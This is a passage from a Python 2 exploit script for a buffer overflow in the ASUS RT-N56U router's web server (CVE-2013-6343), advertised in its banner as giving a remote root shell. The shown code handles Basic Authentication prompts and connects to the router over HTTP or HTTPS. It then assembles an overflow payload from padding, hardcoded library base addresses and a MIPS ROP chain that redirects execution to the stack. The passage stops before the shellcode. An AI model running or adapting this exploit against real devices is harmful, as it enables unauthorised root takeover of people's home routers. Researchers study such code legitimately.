if auth.lower() == "yes":
print "\n\n[!!!] You chose to use HTTP Basic Authentication [!!!]\n"
sleep(1)
User, Pass = creds()
return base64.encodestring("%s:%s" % (User, Pass)).replace("\n", "")
elif auth.lower() == "no":
print "\n\n[!!!] You chose not to use HTTP Basic Authentication. [!!!]\n"
sleep(1)
return 0
else:
print "\n\n[!!!] Error: You entered %s. Please enter \"yes\" or \"no\"! [!!!]\n" % auth
sleep(1)
def sigHandle(signum, frm): # Signal handler
print "\n\n[!!!] Cleaning up the exploit... [!!!]\n"
sleep(1)
exit(0)
def main():
print """\n[*] Title: ASUS RT-N56U Remote Root Shell Exploit - apps_name
[*] Discovered and Reported: October 2013
[*] Discovered/Exploited By: Jacob Holcomb/Gimppy - Security Analyst @ ISE
[*] Contact: Twitter - @rootHak42
[*] Software Vendor:
[*] Exploit/Advisory: ,
[*] Software: httpd (Listens on TCP/80 and TCP/443)
[*] Tested Firmware Versions: 3.0.0.4.374_979 (Other versions may be vulnerable)
[*] CVE: ASUS RT-N56U Buffer Overflow: CVE-2013-6343\n"""
signal.signal(signal.SIGINT, sigHandle) #Setting signal handler for ctrl + c
target = targURL()
try:
print "\n [*] Creating network socket"
netSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if target[0:5] == "https":
host = target[8:]
port = 443
print " [*] Preparing SSL/TLS support."
https_netSock = ssl.wrap_socket(netSock)
finger = fingerPrint(host, port, https_netSock)
else:
host = target[7:]
port = 80
finger = fingerPrint(host, port, netSock)
except Exception as error:
print "\n [!!!] ERROR! %s %s [!!!]\n\n" % (type(error), error)
exit(0)
auth = basicAuth()
junk = "\x42" * 109
link_nop = "2Aa3"
#Base address of ld_uClibc and libc in httpd address space
ld_uClibcBase = 0x2aaa8000
libcBaseAddr = 0x2ab5f000
#Rop Chain
#<chown+68>: move v0,s0 -> sched_yield()
#<chown+72>: lw ra,28(sp) -> Rop2
#<chown+76>: lw s0,24(sp)
#<chown+80>: jr ra
#<chown+84>: addiu sp,sp,32
saved_ra1 = struct.pack("<L", libcBaseAddr + 0x73f4)
#<_dl_runtime_pltresolve+68>: lw ra,36(sp) -> Rop 3
#<_dl_runtime_pltresolve+72>: lw a0,16(sp)
#<_dl_runtime_pltresolve+76>: lw a1,20(sp)
#<_dl_runtime_pltresolve+80>: lw a2,24(sp)
#<_dl_runtime_pltresolve+84>: lw a3,28(sp)
#<_dl_runtime_pltresolve+88>: addiu sp,sp,40
#<_dl_runtime_pltresolve+92>: move t9,v0
#<_dl_runtime_pltresolve+96>: jr t9 -> jump sched_yield()
#<_dl_runtime_pltresolve+100>: nop
saved_ra2 = struct.pack("<L", ld_uClibcBase + 0x4e94)
#<setrlimit64+144>: addiu a1,sp,24 -> ptr to stack
#<setrlimit64+148>: lw gp,16(sp)
#<setrlimit64+152>: lw ra,32(sp) -> Rop 4
#<setrlimit64+156>: jr ra -> jump Rop 4
#<setrlimit64+160>: addiu sp,sp,40
saved_ra3 = struct.pack("<L", libcBaseAddr + 0x9ce0)
#move t9,a1 -> ptr to jalr sp on stack
#addiu a0,a0,56
#jr t9 -> jump to stack
#move a1,a2
saved_ra4 = struct.pack("<L", libcBaseAddr + 0x308fc)